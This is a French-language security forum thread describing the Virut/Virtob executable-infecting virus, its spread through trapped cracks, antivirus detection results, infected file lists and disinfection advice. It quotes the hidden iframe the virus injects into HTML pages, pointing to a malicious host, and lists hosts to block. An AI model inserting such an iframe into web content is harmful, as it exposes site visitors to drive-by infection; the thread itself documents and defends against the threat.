Virut /Virtob / Vitro : infection de fichiers executables.

Liste des rogues, faux-antispywares, phising, hoax etc.. et autres arnaques en tout genre sur internet.
Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 90188
Inscription : 10 sept. 2005 13:57
Contact :

Virut /Virtob / Vitro : infection de fichiers executables.

Message par Malekal_morte » 23 sept. 2007 13:18

Virut (ou Virtob) est un virus au vrai sens du terme puisqu'il infecte les fichiers exécutables (.exe, .dll, .scr)

Méthode de propagation

Découvert le 18 septembre 2007, ce dernier se propage via des cracks piégés disponibles depuis des sites "fakes"
Comme vous pouvez le constater, les cracks sont encore utilisés pour propager des infections, voir le sujet Le danger des cracks!.

Voici la vidéo illustrative :


Ci-joint le taux de détection d'un des fichiers du crack à une date donnée - vous en tirez vos propres conclusions :
File install.exe received on 2009.11.22 18:05:43 (UTC)
Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED
Result: 11/41 (26.83%)

Antivirus Version Last Update Result
a-squared 4.5.0.41 2009.11.22 Virus.Win32.Virut!IK
AhnLab-V3 5.0.0.2 2009.11.20 -
AntiVir 7.9.1.72 2009.11.22 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2009.11.20 -
Authentium 5.2.0.5 2009.11.22 -
Avast 4.8.1351.0 2009.11.22 -
AVG 8.5.0.425 2009.11.22 -
BitDefender 7.2 2009.11.22 -
CAT-QuickHeal 10.00 2009.11.21 (Suspicious) - DNAScan
ClamAV 0.94.1 2009.11.22 -
Comodo 2999 2009.11.22 -
DrWeb 5.0.0.12182 2009.11.22 -
eSafe 7.0.17.0 2009.11.19 -
eTrust-Vet 35.1.7133 2009.11.20 -
F-Prot 4.5.1.85 2009.11.22 -
F-Secure 9.0.15370.0 2009.11.20 -
Fortinet 3.120.0.0 2009.11.22 -
GData 19 2009.11.22 -
Ikarus T3.1.1.74.0 2009.11.22 Virus.Win32.Virut
Jiangmin 11.0.800 2009.11.22 -
K7AntiVirus 7.10.901 2009.11.20 -
Kaspersky 7.0.0.125 2009.11.22 -
McAfee 5810 2009.11.22 -
McAfee+Artemis 5810 2009.11.22 Artemis!69E260EDEBD5
McAfee-GW-Edition 6.8.5 2009.11.22 Heuristic.LooksLike.Win32.SuspiciousPE.B!87
Microsoft 1.5302 2009.11.22 Virus:Win32/Virut.gen!O
NOD32 4627 2009.11.21 -
Norman 6.03.02 2009.11.21 W32/Obfuscated.EA
nProtect 2009.1.8.0 2009.11.22 -
Panda 10.0.2.2 2009.11.22 -
PCTools 7.0.3.5 2009.11.22 -
Prevx 3.0 2009.11.22 -
Rising 22.22.06.04 2009.11.22 -
Sophos 4.47.0 2009.11.22 Sus/UnkPack-C
Sunbelt 3.2.1858.2 2009.11.22 LooksLike.Win32.InfectedFile!A (v)
Symantec 1.4.4.12 2009.11.22 -
TheHacker 6.5.0.2.075 2009.11.20 -
TrendMicro 9.0.0.1003 2009.11.22 Possible_Virus
VBA32 3.12.12.0 2009.11.22 -
ViRobot 2009.11.20.2047 2009.11.20 -
VirusBuster 5.0.21.0 2009.11.22 -
Additional information
File size: 24177 bytes
MD5...: 69e260edebd58f21e3db57f43ce2d6ac
SHA1..: 2ef22c22a82f188827ac58f0eaa97a8ddaaefe41
Il est bien entendu possible de récupérer l'infection par un ami, ce dernier vous envoyant un fichier exécutable infecté.

Vous pouvez aussi contracter l'infection via des Exploit sur site Web puisque Virut/Virtob modifie aussi tous les fichiers html de l'ordinateur infecté pour y insérer une iframe :

Code : Tout sélectionner

<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
Si vous êtes webmaster, vous pouvez donc avoir uploadé sur votre site WEB des pages avec cette iframe potentiellement pouvant infecter votre visiteur.

Désinfection...

Virut se propage très rapidement sur le système... Ce qui fait qu'il est très difficile de désinfecter ce dernier...
Un scan en ligne par exemple chez Kaspersky permet de confirmer ou non l'infection sur le système.

On se retrouve vite via des scans en ligne avec une série de fichiers infectés.
NIRCMD.exe;C:\WINDOWS;Win32.Virut.56;Désinfecté.;
notepad.exe;C:\WINDOWS;Win32.Virut.56;Désinfecté.;
regedit.exe;C:\WINDOWS;Win32.Virut.56;Désinfecté.;
sed.exe;C:\WINDOWS;Win32.Virut.56;Désinfecté.;
SWREG.exe;C:\WINDOWS;Win32.Virut.56;Désinfecté.;
SWSC.exe;C:\WINDOWS;Win32.Virut.56;Désinfecté.;
TASKMAN.EXE;C:\WINDOWS;Win32.Virut.56;Désinfecté.;
twunk_32.exe;C:\WINDOWS;Win32.Virut.56;Désinfecté.;
vFind.exe;C:\WINDOWS;Win32.Virut.56;Désinfecté.;
winhlp32.exe;C:\WINDOWS;Win32.Virut.56;Désinfecté.;
spuninst.exe;C:\WINDOWS\$hf_mig$\KB885250;Win32.Virut.56;Désinfecté.;
update.exe;C:\WINDOWS\$hf_mig$\KB885250\update;Win32.Virut.56;Désinfecté.;
spuninst.exe;C:\WINDOWS\$hf_mig$\KB885835;Win32.Virut.56;Désinfecté.;
update.exe;C:\WINDOWS\$hf_mig$\KB885835\update;Win32.Virut.56;Désinfecté.;
spuninst.exe;C:\WINDOWS\$hf_mig$\KB885836;Win32.Virut.56;Désinfecté.;
update.exe;C:\WINDOWS\$hf_mig$\KB885836\update;Win32.Virut.56;Désinfecté.;
spuninst.exe;C:\WINDOWS\$hf_mig$\KB887472;Win32.Virut.56;Désinfecté.;
msmsgs.exe;C:\WINDOWS\$hf_mig$\KB887472\SP2QFE;Win32.Virut.56;Désinfecté.;
update.exe;C:\WINDOWS\$hf_mig$\KB887472\update;Win32.Virut.56;Désinfecté.;
spuninst.exe;C:\WINDOWS\$hf_mig$\KB887742;Win32.Virut.56;Désinfecté.;
update.exe;C:\WINDOWS\$hf_mig$\KB887742\update;Win32.Virut.56;Désinfecté.;
ERDNT.EXE;C:\WINDOWS\ERDNT\Hiv-backup;Win32.Virut.56;Désinfecté.;
ERDNT.EXE;C:\WINDOWS\ERDNT\subs;Win32.Virut.56;Désinfecté.;
places.exe;C:\WINDOWS\Installer\{350C940c-3D7C-4EE8-BAA9-00BCB3D54227};Win32.Virut.56;Désinfecté.;
agentsvr.exe;C:\WINDOWS\msagent;Win32.Virut.56;Désinfecté.;
HelpCtr.exe;C:\WINDOWS\pchealth\helpctr\binaries;Win32.Virut.56;Désinfecté.;
HelpHost.exe;C:\WINDOWS\pchealth\helpctr\binaries;Win32.Virut.56;Désinfecté.;
HelpSvc.exe;C:\WINDOWS\pchealth\helpctr\binaries;Win32.Virut.56;Désinfecté.;
HscUpd.exe;C:\WINDOWS\pchealth\helpctr\binaries;Win32.Virut.56;Désinfecté.;
notiflag.exe;C:\WINDOWS\pchealth\helpctr\binaries;Win32.Virut.56;Désinfecté.;
accwiz.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
calc.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
charmap.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
cleanmgr.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
conime.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
cscript.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
diskperf.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
dvdupgrd.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
findstr.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
freecell.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
ipconfig.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
magnify.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
mmc.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
mobsync.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
mshearts.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
mspaint.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
mstsc.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
net1.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
notepad.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
ntbackup.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
odbcad32.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
osk.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
ping.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
qprocess.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
rcimlby.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
route.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
runonce.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
setup.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
sndrec32.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
sndvol32.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
sol.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
sort.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
spider.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
taskmgr.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
tcmsetup.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
tsshutdn.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
typeperf.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
utilman.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
winhlp32.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
winmine.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
wscript.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
wuauclt1.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
wupdmgr.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
comrepl.exe;C:\WINDOWS\system32\Com;Win32.Virut.56;Désinfecté.;
comrereg.exe;C:\WINDOWS\system32\Com;Win32.Virut.56;Désinfecté.;
ctfmon.exe;C:\WINDOWS\system32\dllcache;Win32.Virut.56;Désinfecté.;
spoolsv.exe;C:\WINDOWS\system32\dllcache;Win32.Virut.56;Désinfecté.;
svchost.exe;C:\WINDOWS\system32\dllcache;Win32.Virut.56;Désinfecté.;
userinit.exe;C:\WINDOWS\system32\dllcache;Win32.Virut.56;Désinfecté.;
rstrui.exe;C:\WINDOWS\system32\Restore;Win32.Virut.56;Désinfecté.;
migwiz.exe;C:\WINDOWS\system32\usmt;Win32.Virut.56;Désinfecté.;
wmiprvse.exe;C:\WINDOWS\system32\wbem;Win32.Virut.56;Désinfecté.;
Si le nombre de fichiers infectés est minimale et si peu de fichiers systèmes (répertoire Windows et System32) sont touchés, vous pouvez tenter la désinfection : Selon le nombre de fichiers infectés, vous pouvez tourner vite en rond.
De plus si les fichiers systèmes Windows sont touchés, il est conseillé de formater d'autant plus que vous pouvez passer des heures à tenter de désinfecter votre système pour au final avoir des dommages colatéraux (réseau qui ne fonctionne plus etc). :
Afin de ne pas se faire réinfecter suite au formatage vous devez suivre les indications suivantes :
  • ne garder aucun fichier exécutable. Si vous gardez un fichier exécutable infecté par Virut et que vous l'exécutez après le formatage vous allez réinfecter l'ordinateur.
  • ne retélécharger pas de cracks après le formatage sinon vous allez réinfecter à nouveau votre ordinateur.
Se reporter à la page Préparer le formatage de son ordinateur

Juste après le formatage, il peut-être conseillé de rajouter ces deux lignes sur ton fichier HOSTS Windows (voir https://www.malekal.com/windows_fichier_host.php ) :
127.0.0.1 brenz.pl
127.0.0.1 chura.pl
Attention aux medias amovibles et partitions secondaires :
Une fois le système formaté, faites attention aux partitions secondaires, clef USB et disque dur externe, vous pouvez avoir infecté des fichiers dans ces médias... si vous réexecutez un de ces fichiers, vous remettez l'infection sur votre système.
Scannez donc ces médias avant toute exécution de fichiers.

Si vous avez un doute sur un fichier exécutable, scannez le sur VirusTotal, après l'exécution de ce dernier, ce sera trop tard!


Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.


Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 90188
Inscription : 10 sept. 2005 13:57
Contact :

Re: Virut.Q via des cracks

Message par Malekal_morte » 23 févr. 2009 14:35

Page de désinfection mise à jour avec la variante 2009 : https://www.malekal.com//Win32:virut.php
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 90188
Inscription : 10 sept. 2005 13:57
Contact :

Re: Virut : infection de fichiers executables.

Message par Malekal_morte » 19 avr. 2009 14:27

19/04/2008 : Page revue.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 90188
Inscription : 10 sept. 2005 13:57
Contact :

Re: Virut aka Virtob : infection de fichiers executables.

Message par Malekal_morte » 04 nov. 2009 00:36

03/11/2009 : Ajout d'une vidéo avec des cracks menant à l'infection Virut.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.


Répondre

Revenir vers « Sécurité : Prévention, Désinfection autonome, virus & arnaques et dangers d'Internet »